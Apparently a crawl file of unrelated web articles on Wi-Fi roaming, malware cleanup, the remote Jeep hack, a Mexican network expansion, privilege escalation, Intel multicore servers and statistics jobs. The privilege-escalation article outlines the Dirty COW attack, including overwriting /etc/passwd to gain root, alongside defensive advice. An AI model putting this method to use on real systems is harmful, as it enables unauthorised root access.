AP-2 responded with an 802.11 probe response. Because the only response was from AP-2, the client radio card decided to associate with AP-2. As expected, the association process with AP-2 consisted of the exchange of 802.11 authentication and association frames (based on 802.11 open system authentication).
The re-association process took 68 milliseconds, which is the time between the client radio issuing the first dissociation frame to AP-1 and the client receiving the final association frame (response) from AP-2. This is quite good, and I’ve found similar values with other vendor access points.
The entire roaming process, however, will interrupt wireless applications for a much longer period of time. For example, based on my tests, the FTP process halts for an average of five seconds prior to the radio card initiating the re-association process (i.e., issuing the first disassociation frame to AP-1). I measured 802.11 packet traces indicating that the client radio card re-retransmits data frames many times to AP-1 (due to weak signal levels) before giving up and initiating the re-association with AP-2. This substantial number of retransmissions disrupted the file download process, which makes the practical roaming delay in my tests an average of five seconds! Centrino is notorious for having this problem, but I’ve found this to be the case with most other radio cards as well.
Vendors are likely having WLAN client cards hold off on re-associations to avoid premature and excessive re-associations (access point hopping). Unfortunately, this disrupts some wireless applications. If you plan to deploy mobile wireless applications, be sure to test how roaming impacts the applications.
Every model of radio card will behave differently when roaming due to proprietary mechanisms, and some cards will do better than others. Just keep in mind that roaming may take much longer than expected, so take this into account when deploying wireless LAN applications, especially wireless voice, which is not tolerant to roaming delays exceeding 100 milliseconds.
Jim Geier is the principal of Wireless-Nets, Ltd, a consulting firm focusing on the implementation of wireless mobile solutions and training. He is the author of the books Deploying Voice over WLANs (Cisco Press), Wireless LANs (Sams) and Wireless Networks – First Step (Cisco Press).
This article was first published on WiFiPlanet.com. | <urn:uuid:0ad99f8a-a384-495a-acb6-948ee58afccd> | CC-MAIN-2022-40 | https://www.datamation.com/mobile/is-wi-fi-roaming-really-seamless/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00114.warc.gz | en | 0.946237 | 1,036 | 2.625 | 3 |
Unix admins have known this for a long time. There is only one way to reliably clean ANY infected machine…wipe and reload.
For a long time, the best-practices approach to malware infections has been to re-format and re-image the infected machine from known clean media. However, there are some corporate security teams that continue to simply run an antivirus product as a way to clean the computer of malware. This is often the case, especially when faced with an infection by “nuisance” malware such as spambots or rogue antivirus programs. The danger in simply running an antivirus product against the machine is that even if the antivirus product cleans the observed infection, how much other malware was installed on the machine that the antivirus engine can’t detect?
There are three major factors at play here, which illustrate why running a “cleaner” tool is often not enough:
Malware has become increasingly more sophisticated and capable of hiding from or disabling anti-malware scanners. These days only a forensic-level investigation can detect certain malware under some conditions.
Malware authors now have easy access to tools that let them run their creations through dozens of antivirus engines at once. Some of these tools do not deliver scanned samples to antivirus companies for analysis, so a malware author can simply keep tweaking his/her creation until it is no longer detected, and then deploy it to your network via existing botnets infections, malvertising, spear-phishing, and other attack vectors.
As evidenced by the botnets detailed above, more malware authors are taking advantage of pay-per-install services. These systems will always try to maximize profit and install multiple unique pieces of malware after they initially infect a PC. To date, antivirus has been shown to generally have a 20% or less effectiveness rate against new threats. So for each pay-per-install infection, if you detect one bot, there might be four more installed alongside that aren’t detected.
The major risk is that while you might have removed the nuisance malware, something more sinister may still be lying in wait to steal or destroy data. Any compromise of a PC should be treated as if it has the potential to do the maximum damage. One could hire a malware expert to do low-level forensic analysis on the infected system, but in some cases, it comes down to the skill of the expert versus the skill of the malware author – both are essentially unknowns. This is why we repeat the mantra of “re-format/re-image” – it’s the only way to effectively mitigate the risk with a high level of assurance. | <urn:uuid:7ecc3e3e-d85b-4365-b337-88329888977f> | CC-MAIN-2022-40 | https://etc-md.com/2011/03/17/how-to-clean-an-infected-windows-pc/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00114.warc.gz | en | 0.945891 | 546 | 2.53125 | 3 |
Last Updated on August 7, 2015
You are driving your Cherokee Jeep like you normally do, you tune the radio on your favorite station, and you suddenly realize there is something completely wrong. The car does not follow your orders anymore: the radio tuner ignores your settings and chooses the radio station on its own, the windshield wipers turn on and, even worse, the car decides autonomously when steering, accelerating or braking.
What it could seem a science fiction movie (ideally an episode of The Twilight Zone) is getting real and, more in detail, is the result of a car-hacking research two well known security researchers had been doing over the past year.
Charlie Miller and Chris Valasek have exploited (and demonstrated on a busy highway) a severe vulnerability on Uconnect, an infotainment system “that brings interactive ability to the in-car radio and telemetric-like controls to car settings”. This vulnerability allows a potential attacker to take the control of the car from miles away, using its Sprint cellular connection.
The impact of this vulnerability is potentially devastating, considering that Uconnect is installed on millions of FCA (Fiat Chrysler Automotive) cars worldwide. In particular the researchers have discovered that a
weak vulnerable element (which the researchers won’t identify until their Black Hat talk), lets anyone who knows the car’s IP address gain access from anywhere via the Sprint cellular connection used by Uconnect. It’s quite uncanny, isn’t it?
From that entry point is it possible to rewrite the car’s head unit firmware to inplant the malicious code, which is capable of sending custom commands through the CAN bus, the car’s internal computer network, to the physical components like the engine and wheels.
Fortunately, during their presentation at Black Hat, the researchers won’t disclose the code that rewrites the chip’s firmware (this implies that an attacker could take months to reverse the firmware). Besides they have been sharing their research with FCA over the past months, enabling the company to release a patch (to be manually installed) before the Black Hat conference.
In any case, despite the automaker has already patched the vulnerability (but the manual installation procedure will likely leave many cars unprotected), it “did not appreciate” the decision of the two researchers to publish the exploit. Additionally, even the way in which the vulnerability was shown seems quite perplexing: the two researchers maybe went too far, deciding to demo the car hijacking in a busy highway (and several actions performed, such as cutting the transmission, could endanger the lives of the other drivers).
Two things are certain, it’s time for the automotive industry to make security play a central role when designing new models, and it’s also time for a new legislation to tighten car’s protection from cyber attacks. For this second aspect, something is moving though. In the meantime, if you own an FCA car, please update Uconnect as soon as you can. | <urn:uuid:eee8d093-4aa0-435d-847a-1a658073cfe1> | CC-MAIN-2022-40 | https://www.hackmageddon.com/2015/07/21/researchers-show-how-to-remotely-hack-a-jeep/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00114.warc.gz | en | 0.94998 | 627 | 2.53125 | 3 |
Connectivity brings us together, but it is not always an easy road. Mexico is Latin America’s second-largest market, preceded only by Brazil. While mobile technology has long been available in Mexico, access to affordable fixed-line Internet only started to become available in the past decade, and connectivity still varies across the country. This lack of access to Information and Communications Technology (ICT) is known as the digital gap or the digital inequality, and depends on a range of social and geographical factors.
In 2013, following recommendations in an OECD review, Mexico embarked on an overhaul of its telecommunication and broadcast markets to bring more competition, investment and consumer benefits to its telecommunications industry. Telcos and a healthy telecommunications market play critical roles in enabling digital transformation, improving productivity and economic growth, and allowing governments to provide public services.
Prior to this, Mexico had some of the highest telco prices in the OECD, making Internet unaffordable for many in the region. However, bridging the digital gap required Mexico to make communication services more efficient and accessible to people, in particular high-speed broadband, telephony and Internet access in rural areas.
“Before this reform, many Mexicans struggled to pay for long-distance calls to relatives and could not afford mobile Internet services that other countries took for granted. Three-quarters of households had no Internet access. Today, communication services are much more affordable, and millions more people are online.” – Gabriela Ramos, OECD Chief of Staff and G20 Sherpa
A decade of growth and demand
These reforms brought tangible benefits. Among other measures, they opened Mexico’s market, lifted restrictions on foreign direct investment in telecommunication and satellite communication services, and successfully achieved a digital switchover in 2016, which reinforced the country’s domestic communication infrastructures. According to the OECD report, these reforms spurred competition, increased access, lowered prices in mobile broadband by 69 percent to 81 percent and provided higher quality communication services.
“Mobile broadband subscriptions more than tripled between 2012 and 2016, with the addition of 50 million new ones. This meant more revenue for telecommunication and broadcasting players. Growth in the telecommunication and broadcasting sectors has been faster than the broader economy since the reforms, and investment in the sector has increased steadily. Meanwhile, from 2014 to 2017, barriers to trade in the Mexican telecom sector fell faster than in other OECD countries, opening the market to new entrants. The sharp drop in the cost of telephone calls and Internet access overwhelmingly benefitted poorer families in a country where spending on fixed and mobile phone services in the poorest households averaged 10 percent and 6.2 percent of monthly incomes compared with 1.8 percent and 1.2 percent in the wealthiest households.” (OECD Report)
Arelion expands into Mexico
Arelion (formerly Telia Carrier) was among the first major international telecom companies to support Mexico’s international market growth after 2013 market reforms. Collaboration with key partners has resulted in numerous Points of Presence (PoPs) in Mexico, including data centers in Querétaro, Monterrey, Merida, and Mexico City, as well as PoPs in the US border markets in El Paso, Laredo, McAllen and San Diego. Local partners include Neutral Networks, QuattroCom, Equinix, KIO Networks, C3ntro Telecom, Ai Telecom and PoPs in the border markets with MDC, VTX and Edgeconnex
Two of the newest recently announced Points of Presence (PoPs) enhance the ecosystem in Mexico City, enabling local connectivity to Arelion’s number one ranked global backbone, AS1299 and enabling critical applications, such as cloud security services and live video collaboration, locally to their end users avoiding long routes from Mexico to US. The new sites are located in strategic locations in Mexico City located in Santa Fe and Tultitlán.
These PoPs are dynamic, fiber-connected access points providing cloud utility at scale to metro populations and businesses, enabling many companies to expand work-from-home environments via cloud networks. These hubs serve thousands of enterprise companies and millions of local consumers, furnishing secure connectivity for the growing companies of Mexico.
Spanning 70,000 km of fiber and using state-of-the-art DWDM and IP technology, our network infrastructure connects Mexico to the rest of North America, Europe, and Asia, providing new opportunities for local and international businesses. Broadband and mobile operators and ISPs connecting to Arelion’s backbone can provide higher quality access (lower latency, no buffering, higher resolutions) to content delivered to their end-users (residential or businesses), driving demand and growth of local internet traffic.
Future growth opportunities
Mexico continues to be a strategic business and technology hub for many Latin American, American and global businesses. As in other countries around the world, public cloud availability is a key element for the large-scale digital transformations of companies.
Internet traffic in Mexico is exploding. Supply chain challenges impacting the availability of transmission equipment and routing gear have limited growth and access to this emerging area for top cloud, gaming, cloud security and mobile application companies. This expansion and cooperation in bringing Internet connectivity at scale helps meet the immediate demand for this bandwidth.
Arelion’s continued organic expansion in Mexico also provides crucial backbone services for major global services, including content and cloud providers that require low latency and high-speed connectivity as noted in our recent launch announcement with Oracle Cloud in Queretaro. This expansion also creates an opportunity to address regional content providers’ local, in-market connectivity needs, offering them the highest quality service and connectivity for tomorrow’s global businesses.
Businesses in Mexico City can now take advantage of Arelion’s number one ranked global backbone, AS1299, and the local availability of high-speed IP Transit, Cloud Connect, DDoS Mitigation, Ethernet and IPX services for operators, content providers and enterprises alike.
Luis Velasquez, Mexico Business Manager
Subscribe to our blog and keep up-to-date on news, insights and happenings.
As a subscriber you will receive:
- Monthly newsletter summararizing news and events
- Invitations to events and webinars hosted by our thechnology gurus
- Notifications each time there is a new blog | <urn:uuid:70121620-7c7b-4ab7-9ece-2a5dfa25fd1e> | CC-MAIN-2022-40 | https://blog.arelion.com/2022/07/07/mexico-expansion-bridging-borders/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00114.warc.gz | en | 0.932534 | 1,301 | 2.765625 | 3 |
Types of privilege escalation
In general, attackers exploit privilege escalation vulnerabilities in the initial attack phase to override the limitations of their initial user account in a system or application. There are two main types of privilege escalation: horizontal privilege escalation to access the functionality and data of a different user and vertical privilege escalation to obtain elevated privileges, typically of a system administrator or other power user.
With horizontal privilege escalation, malicious actors remain on the same general privilege level but can access data or functionality of other accounts or processes that should be unavailable to them. For example, this may mean using a compromised office workstation to gain access to other office users’ data. For web applications, one example of horizontal escalation might be using session hijacking to bypass authentication and get access to another user’s account on a social site, e-commerce platform, or e-banking site.
More dangerous is vertical privilege escalation (also called privilege elevation), where the attacker gains the rights of a more privileged account – typically the administrator or system user on Microsoft Windows or root on Unix and Linux systems. With this elevated level of access, the attacker can wreak all sorts of havoc in your computer systems and applications: steal access credentials and sensitive data, download and execute ransomware, erase data, or execute arbitrary code. Advanced attackers will use elevated privileges to cover their tracks by deleting access logs and other evidence of their activity, leaving the victim unaware that an attack took place at all. That way, cybercriminals can covertly steal information and plant backdoors or other malware in company systems.
Why privilege escalation is so dangerous
Privilege escalation is often one part of a multi-stage attack, allowing intruders to deploy a malicious payload or execute malicious code in the targeted system. This means that whenever you detect or suspect privilege escalation, you also need to look for signs of other malicious activity. But even without evidence of further attacks, any privilege escalation incident is an information security issue in itself because someone could have gained unauthorized access to personal, confidential, or otherwise sensitive data. In many cases, this will have to be reported internally or to the relevant authorities to ensure compliance.
Worse still, it can be hard to distinguish between routine and malicious activity to detect privilege escalation incidents. This is especially true for rogue users who might have legitimate access yet perform malicious actions that compromise system or application security. However, if you can quickly detect successful or attempted privilege escalation, you have a good chance of stopping the intruders before they can establish a foothold to launch their main attack.
Privilege escalation on Linux with Dirty COW
Many cyberattacks start by compromising a web server, which is often accessible from the Internet. Attackers can then exploit vulnerabilities or misconfigurations to obtain root privileges on the host system. This may allow them to gain access to the file system and any other server processes running in the same system or even gain a foothold in the local network to launch attacks against other systems. Crucially, web servers are used not just for hosting websites and web applications – many printers, routers, and Internet of Things (IoT) devices routinely run a web server for their administrative interface. Once compromised, such a device can be used to launch further attacks within the local network.
The majority of web servers in use today, including many embedded systems, are hosted on some flavor of Linux. Older versions of the Linux kernel (prior to 4.8.3, 4.7.9, or 4.4.26) were vulnerable to a local privilege escalation attack dubbed Dirty COW (from Dirty Copy-On-Write), which allowed attackers to make read-only memory mappings writable. While this is a local attack, it is still extremely dangerous because the only guaranteed protection is to upgrade the Linux kernel – and that’s not always easy or possible, especially with embedded systems. But how exactly does it work?
To start with, the attacker needs to gain access to a regular, unprivileged user account, usually by exploiting a bug or misconfiguration. Once a user shell is available, it’s now a matter of downloading and executing one of many existing exploit scripts for Dirty COW – see this GitHub page for a list. The vulnerability can be exploited for privilege escalation in different ways, depending on the desired effect. One way is to modify the system password file /etc/passwd by replacing the root user with a newly created user who will then have root privileges.
While Dirty COW is likely the most serious privilege escalation vulnerability ever discovered for Linux, it only affects older and unpatched systems. It also requires access to a local user shell and some way of downloading the exploit script, so you can mitigate its impact by following good security practices listed later in this article.
Detecting privilege escalation in Windows
Microsoft Windows determines the ownership of a running process using access tokens. The access token mechanism can be targeted by attackers to tamper with access tokens, bypass user account control (UAC), and assume the process rights of another user, but in Windows 10 and Windows Server 2016 you can set an audit event to detect any such changes. When you enable the Audit Token Right Adjusted event, the system will generate 4703 events for audit token modifications that may signal privilege escalation attempts.
To enable this audit event, open the Group Policy Management Editor and under Advanced Audit Policy Configuration > Audit Policies > Detailed Tracking set the Audit Token Right Adjusted event to Success and Failure. Now you will receive a 4703 event every time a token right is modified, resulting in a flood of legitimate events from system processes. Use your event monitoring software to narrow this down by searching only for 4703 events related to potentially suspicious changes. One common target for attackers is SeDebugPrivilege – a system privilege that grants a user full debugging access to a process. If this gets set when nobody is doing any debugging, you can be pretty certain something is up.
For details of this audit event, see Audit Authorization Policy Change in the Microsoft docs. See also Security Monitoring Recommendations for tips on filtering the 4703 events generated when you use this method.
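If your monitoring pipeline exports events as structured records, the triage step can be scripted. The sketch below assumes the 4703 events have already been flattened into dictionaries with "EventID" and "EnabledPrivilegeList" keys; "EnabledPrivilegeList" is a genuine field of event 4703, but the export format itself (wevtutil, PowerShell, a SIEM feed) is an assumption.

```python
# Minimal triage for exported 4703 events: keep only those where a
# watched privilege -- SeDebugPrivilege by default -- was enabled.
def suspicious_4703(events, watch=("SeDebugPrivilege",)):
    hits = []
    for event in events:
        if event.get("EventID") != 4703:
            continue
        enabled = event.get("EnabledPrivilegeList") or ""
        if any(priv in enabled for priv in watch):
            hits.append(event)
    return hits
```

Filtering further on the subject account and process name (both present in the event) cuts the noise from the legitimate system activity mentioned above.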
How to protect your systems from privilege escalation
Attackers can use many privilege escalation techniques to achieve their goals. But to attempt privilege escalation in the first place, they usually need to gain access to a less privileged user account. This means that regular user accounts are your first line of defense. Follow these best-practice tips to ensure strong access controls:
- Enforce secure password policies for all users: This is the simplest way to improve security (after all, the majority of data breaches start with weak or compromised credentials), though also the hardest to apply in practice. Passwords need to be strong enough to resist guessing and brute force attacks, but your access management choices shouldn’t impact user convenience and productivity.
- Create specialized users and groups with minimum necessary privileges and file access: Apply the principle of least privilege to mitigate the risk posed by any compromised user accounts, both for regular users and administrator accounts. While it’s convenient to give administrators godlike administrative privileges for all system resources, a single account can then provide attackers with a single point of access to the system or local network.
- Educate users to detect social engineering attacks: People love to be helpful, so getting escalated privileges can be as simple as politely asking for login credentials while convincingly posing as IT helpdesk or a distant colleague in distress. Educating all users to be wary of social engineering attempts and phishing emails is vital for cybersecurity.
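The first tip above can be partially automated. Here is a minimal password policy check; the length threshold and character-class rule are illustrative choices, not a standard, and a production system should also reject passwords that appear in known breach corpora.

```python
import string

# Illustrative policy: minimum length plus at least three of the four
# character classes. Thresholds are examples, not a compliance standard.
def meets_policy(password: str, min_length: int = 12) -> bool:
    if len(password) < min_length:
        return False
    classes = [
        any(c.islower() for c in password),
        any(c.isupper() for c in password),
        any(c.isdigit() for c in password),
        any(c in string.punctuation for c in password),
    ]
    return sum(classes) >= 3
```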
Applications can provide an entry point for any attack, so it’s vital to keep them secure:
- Avoid common programming errors in your applications: Follow secure development practices to avoid common programming errors that are most often targeted by attackers, such as buffer overflows, code injection, and unvalidated user input.
- Secure your databases and sanitize user inputs: Database systems make especially attractive targets, as many modern web applications and frameworks store all their data in databases – including configuration settings, login credentials, and user data. With just one successful attack, for example by SQL injection, attackers can gain access to all this information and use it for further attacks.
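The standard defense against SQL injection is parameterized queries. This self-contained sketch, using Python's built-in sqlite3 module and a throwaway table, shows how a classic `' OR '1'='1` payload leaks every row when spliced into the SQL string but returns nothing when bound as a parameter:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret'), ('bob', 'hunter2')")

payload = "nobody' OR '1'='1"

# Vulnerable: attacker-controlled text is spliced into the statement,
# so the OR clause matches every row.
leaked = conn.execute(
    f"SELECT * FROM users WHERE name = '{payload}'").fetchall()

# Safe: the driver binds the payload as a literal value; no user has
# that name, so nothing comes back.
safe = conn.execute(
    "SELECT * FROM users WHERE name = ?", (payload,)).fetchall()

print(len(leaked), len(safe))  # prints: 2 0
```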
Not all privilege escalation attacks directly target user accounts – administrator privileges can also be obtained by exploiting application and operating system bugs and configuration flaws. With careful systems management, you can minimize your attack surface:
- Deploy security patches as soon as possible: Most attacks exploit well-known vulnerabilities, so by keeping your systems and applications patched and updated, you are severely limiting the attackers’ options.
- Ensure correct permissions for all files and directories: As with user accounts, follow the principle of least privilege – if something doesn’t need to be writable or executable, keep it read-only, even if it means a little more work for administrators.
- Close unnecessary ports and remove unused user accounts: Default system configurations often include unnecessary services running on open ports, and each one is a potential vulnerability. You should also remove or rename default and unused user accounts to avoid giving attackers (or rogue former employees) an easy start.
- Remove or tightly restrict all file transfer functionality: Attackers usually need a way to download their exploit scripts, web shells, and other malicious code, so take a close look at all system tools and utilities that enable file transfers, such as FTP, TFTP, wget, curl, and others. Remove the tools you don’t need, and lock down the ones that remain, restricting their use to specific directories, users, and applications.
- Change default credentials on all devices, including routers and printers: Changing the default logon credentials is a crucial step that is often overlooked, especially for less obvious systems, such as printers, routers, and IoT devices. No matter how well you secure your operating systems and applications, just one router with a web interface and a default password of admin is enough to provide attackers with a foothold.
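The file permission advice above can be spot-checked with a short audit script. This sketch flags anything writable by “other” under a directory tree; it is illustrative only and ignores ACLs and symlink targets:

```python
import os
import stat

# Walk a tree and report entries writable by "other" -- a quick way to
# spot permissions that violate least privilege.
def world_writable(root):
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue  # vanished or unreadable entry; skip it
            if mode & stat.S_IWOTH:
                findings.append(path)
    return findings
```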
Check your web applications for vulnerabilities
Websites and web applications expose a global attack surface and are often the first port of call for attackers. Use a high-quality vulnerability scanner to check your sites, applications, web services, and web APIs for vulnerabilities. Modern DAST solutions such as Netsparker are accurate and versatile and are under constant development to stay one step ahead of the attackers. Even if your application was secure last month or even last week, new vulnerability reports and exploits are published every day – and your systems and information might well be in danger even as you read these words. | <urn:uuid:fea9e8cc-fbf8-43bd-b3ca-30d3947233fd> | CC-MAIN-2022-40 | https://www.invicti.com/blog/web-security/privilege-escalation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00114.warc.gz | en | 0.90974 | 2,151 | 2.546875 | 3 |
The keyword in the above headline is “could”. The multicore era was not, you may recall, first heralded by Intel. While Intel was basing its data center processing plan on an architecture called Itanium (which had just been dragged, kicking and screaming, into the 64-bit era), AMD made the first inroads towards producing a dual-core, 64-bit, x86 processor with the performance levels that data centers required. Intel was dragged – not kicking and screaming, but certainly dragged – into producing x86 (x64) as its leading processor line for servers.
But because Intel joined the competition, the complexion of data centers changed, mainly due to one aspect of multicore architecture that even today, a decade later, IT departments don’t quite understand, let alone appreciate: Multicore forced process parallelism into the datacenter – yes, kicking and screaming.
The back door to parallelism
Parallelism is the ability for a set of processors and/or cores in a system to run multiple, coordinated threads simultaneously. How a process gets separated into two or more threads is the exact opposite of magic. With the Itanium architecture that preceded x86/x64 into multicore, threads divide explicitly, meaning the process decides when divisions happen. These split points are milestones that are entered into the process code by the compiler.
Parallelism in x86/x64 is largely implicit, meaning the processor takes advantage of opportunities ascertained through an analysis of the code to determine which parts of a process can be executed in parallel. When Intel created hyperthreading (HT) – a way for one core to run two threads in alternation – its effectiveness was dependent upon software having been compiled in such a way that the processor could make good judgment calls.
And as I reported a decade ago, some processes actually ran more slowly on hyperthreaded processors than on single-threaded ones at the same clock speed. Here’s how I presented the topic in 2005 for the original Tom’s Hardware Guide: “HT is actually one of the many efficiencies that Intel engineers discovered in a way to combat the perennial problem of latency—the fact that single-core processors can spend more than half their clock cycles executing nothing at all.
In the mid-1990s, discovering that traditional single-threaded programs were utilizing only about 35% of a processor’s available resources, Intel realized that, with an added level of hardware sophistication, it could schedule at least one more thread of execution within the unused space. It could only achieve this, however, if each thread “believed” it had the entire processor to itself—including its registers, cache, and access to the front-side bus. So HT schedules the execution of two threads (for now) in alternating fashion—a few cycles for thread #1, a few for thread #2—but only when the results of one thread do not corrupt the image of the CPU for the other. In other words, HT only alternates instructions that cannot get in each other’s way.
The immediate benefit of HT parallelism is that it doesn’t require the software—the programs which constitute each thread—to be aware of any parallelism taking place whatsoever. Each thread, not “knowing” it runs in a split environment, “believes” to have the processor all to itself. As a result, software originally compiled to run on standard single-core processors… need not be recompiled in order to implement parallelism, and to realize at least some boost in performance without involving raising clock speed.”
Four years ago, we saw the proliferation of eight-core processors in the data center, and the dawn of 12-core. But was this necessarily the path of progress? Because most parallelism in use today is implicit, eight cores do not run a process eight times better than one core. As many engineers have told me over the last decade, the net gain from each new core placed onto the stack is exponentially smaller than that from the previous one. And some told me that the ‘point of no return’ – of adding processor cores that essentially added no real power to the operating system – would be at 10 cores.
Today, we’re approaching the onset of 16-core processors. If there were no real gains to be made after 10 cores, we’d know it already.
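The diminishing returns those engineers describe are captured by Amdahl’s law: if a fraction p of a workload parallelizes perfectly, N cores yield a speedup of 1 / ((1 - p) + p / N). The sketch below uses an assumed p of 0.95; the exact figure varies by workload, but the shape of the curve does not.

```python
# Amdahl's law: with a perfectly parallelizable fraction p, the speedup
# on N cores is 1 / ((1 - p) + p / N). At p = 0.95 the speedup can never
# exceed 20x, and every extra core buys less than the one before it.
def speedup(cores: int, p: float = 0.95) -> float:
    return 1.0 / ((1.0 - p) + p / cores)

if __name__ == "__main__":
    for n in (1, 2, 4, 8, 10, 16):
        print(f"{n:3d} cores: {speedup(n):5.2f}x")
```

Whether there is a practical ‘point of no return’ depends entirely on p: at p = 0.95 gains keep coming well past 10 cores, while at p = 0.8 the curve is nearly flat by then.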
The end of the server box
Ever since the onset of the multicore era in 2005, and especially in just the last four years, there have been seismic shifts in software:
* Virtualization has changed the meaning of “process” in a system, and the operating system that runs “user applications” (Linux, Windows Server, Unix) no longer runs as close to the processor as in the previous decade. With the operating system now a “higher-level process,” hypervisors now occupy the lower-level space. This changes the game for multicore, since hypervisors are more homogenous in nature and easier to predict, especially when a company like Intel gives hypervisor makers like VMware and Citrix special processor resources (namely, Intel VT) which they can utilize directly, like an exclusive connection.
* Cloud platforms have radically altered what it means to be a server. Today, a server is a contributor of real estate and resources to a broader processing system. Compute power, storage capacity, memory, and network bandwidth are all becoming singular variables in a very broad formula. No longer is the processor the central focus of all software development, but one wheel in a colossal machine.
* ‘Big data’ has leveraged the versatility of cloud platforms to pool memory from multiple systems into a single field of operation. In so doing, it has managed to join virtualization in replacing user-level operating systems with much more fundamental kernels like Hadoop – designed specifically to run a handful of specialized analytical tasks. Today, not only can these tasks be optimized to run on certain processors including Intel’s, but conceivably Intel processors can be optimized to run them. In a world where the number of items of software a processor handles is more limited, not only the possibilities but the incentives increase for tailoring processors to match the workload.
* Software-defined networking (SDN) enables logic to intelligently define how a network is configured, and uses CPU-based logic to manage the flow of data. It may be the most rapidly developing technology in the history of the back-office. SDN gives manufacturers like Intel the incentive to tailor their CPUs with functions that enable original equipment manufacturers to leverage them to serve as network masters.
Today, there are justifications for 16-core Xeon (and other manufacturers’) CPUs that we didn’t have in 2008 or even 2010. There are market forces at play here: With PC market growth stalled, and by some measures declining, CPU makers need to find other high-volume sales outlets to keep production costs low. The rapid expansion of cloud datacenters may provide one such outlet, but such facilities typically do not require the highest performance CPUs.
Intel’s current generation of processor architecture is called Haswell. Introduced in 2012, it was designed to move more of the control features that typically appear in a chipset – the separate parts that manage a motherboard, such as voltage control – onto the CPU die. According to the company’s public roadmap for the first half of the year, published last January, its Efficient Performance Server Platform is due for a refresh sometime during the latter half of this year.
So is it time for Intel to endow the Haswell generation of Xeon and Xeon Phi (the high-performance line originally made up of co-processors) with more workload-tailored functionality? This isn’t one of those questions I actually know the answer to already, but am treating as a secret just to make myself sound prescient. If datacenters are truly to replace desktops as the centers of x86/x64 processor architecture, then Intel has to consider the server CPU in the context of what it makes the datacenter become, in the same way it used to consider the PC CPU in the context of what it makes the office become.
I have these questions for Intel this week. All during Datacenter Dynamics’ coverage from Hillsboro, Oregon, I’ll be re-examining these questions to see how well and how deeply they’ve been answered:
Is Intel preparing to facilitate a market of purpose-built server racks – not just single servers or blade clusters, but mechanisms designed to separate compute from storage from memory from power from cooling?
Who is Intel’s most influential partner for Xeon technology: high-performance brands we’ve come to know like HP, Lenovo, and more often, Oracle? Communications companies like Cisco and Alcatel-Lucent? Or the ODMs that we’ve come to know for building smartphones, and who may be building more cloud datacenter servers, such as Quanta Computer?
What new form factors could such purpose-built servers take, that could radically reform the architecture of datacenters themselves in just the next four years’ time (when Intel would need to begin rethinking the question all over again for its next generation)? This and other datacenter publications spend quite a few pages tracking the many corporations that build new datacenters, and list how many square feet they’ll consume. But these habits of ours will start looking antiquated if the design of server racks evolves into something more than the product of a multiplication equation.
What will be the definition of “server” by 2018, and will the fundamental characteristics of datacenter design be impacted by any change to it? Intel is faced with market pressures to compete now against ARM, which is moving a 64-bit version of the technology it created for small and embedded devices, into the datacenter. While we used to reserve the term “bare metal server” for a basic, generic component, it’s becoming something of a kit that can, like an ARM-based embedded device, be built to order. When Intel decides to compete in a market space, that decision changes the space.
If we are at the crossroads of a revolution in data center design, then we had better start fathoming the depths of this change today, and isolate and identify the causes. If not, then we could do without all the drumrolls and fanfare. Our job this week will be to gauge whether the changes ahead of us are monumental or merely incremental. Stay tuned. | <urn:uuid:d0c999d2-5055-41a7-9a1c-123574f9fb1b> | CC-MAIN-2022-40 | https://www.datacenterdynamics.com/en/opinions/how-intel-architecture-could-impact-data-centers-again/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00114.warc.gz | en | 0.944887 | 2,204 | 3.3125 | 3 |
Updated 2022—icrunchdata is proud to publish and host the latest job board index for the field of statistics. Here you can find the latest labor information and future trends for high-growth categories of employment in the United States. This statistics jobs report is drawn from a sampling of the best statistics job sites and our proprietary data from statistics job boards, and is compiled by our research team. This compiled research is focused on a particular skill set, so it's inherently quite targeted yet easily digestible at a glance. We'll be adding more information to this report, so stay tuned. Learn more about our IT job board platform.
Statistics is, at its core, the study of data. Built on mathematical principles, it covers data collection and data analysis, including the interpretation and quantification of data. There are two broad perspectives from which data can be viewed. Descriptive statistics focuses on how data is collected and modeled in order to describe it. Inferential statistics takes into account the probability of events and attempts to predict outcomes. One of the main stages of statistical research is data analysis, which works with primary and secondary data sets. Primary data is collected for the primary purpose of the statistical problem; secondary data, as the name suggests, has been collected for some other purpose. Exploring further, there is qualitative and quantitative data. Qualitative data cannot be expressed mathematically but rather with language, for example favorite movie genres or categorical sizes such as small and large. Quantitative data can be quantified with numbers, for example currency, ratios, speed, or distance. Data analysis is where findings are examined and visualized, and where decisions can be made around them. Statistics even has its own programming language for advanced analysis and applications, called R, which enables statisticians to run executable commands and arguments. Then there is Bayesian statistics, the study of probabilities built upon what we already know to be true, which becomes extremely useful for predicting probable outcomes. Almost everything data-related has been derived from common statistical principles and techniques.
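The Bayesian idea mentioned above is easy to make concrete. In this small worked example (the numbers are purely illustrative), a condition affects 1% of a population, and a test has 99% sensitivity and a 5% false positive rate; Bayes’ rule gives the probability of the condition given a positive result:

```python
# Bayes' rule with illustrative numbers: prior prevalence of 1%, test
# sensitivity of 99%, false positive rate of 5%. How likely is the
# condition given a positive result?
def posterior(prior, sensitivity, false_positive_rate):
    evidence = sensitivity * prior + false_positive_rate * (1 - prior)
    return sensitivity * prior / evidence

p = posterior(prior=0.01, sensitivity=0.99, false_positive_rate=0.05)
print(round(p, 3))  # prints: 0.167 -- a positive test is far from certain
```

This counterintuitive result, that a highly accurate test on a rare condition still produces mostly false alarms, is exactly the kind of insight the Bayesian framing makes routine.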
